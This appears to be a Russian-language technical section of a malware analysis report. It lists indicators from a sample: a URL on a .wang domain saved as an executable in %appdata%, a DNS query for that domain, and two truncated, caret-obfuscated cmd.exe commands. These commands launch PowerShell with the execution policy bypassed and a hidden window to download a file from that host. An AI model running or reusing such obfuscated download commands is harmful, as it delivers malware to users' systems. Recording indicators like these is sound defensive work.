Техническая информация
- http://transporingsytw.wang/search.php как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /c "Po^WEr^S^H^elL.eXE -^e^Xec^U^T^IONpoL^ICY bY^p^aSs -^No^P^R^Ofi^LE -^WIndo^WsTYlE ^hI^d^DEN ^(N^E^W-^Ob^JECt S^Ys^t^Em^.n^Et.^wEBClIeNt).Do^W^n^LOAdfi^L^E(^'http://transporings...
- DNS ASK tr#####ringsytw.wang
- '<SYSTEM32>\cmd.exe' /c "Po^WEr^S^H^elL.eXE -^e^Xec^U^T^IONpoL^ICY bY^p^aSs -^No^P^R^Ofi^LE -^WIndo^WsTYlE ^hI^d^DEN ^(N^E^W-^Ob^JECt S^Ys^t^Em^.n^Et.^wEBClIeNt).Do^W^n^LOAdfi^L^E(^'http://transporings...' (со скрытым окном)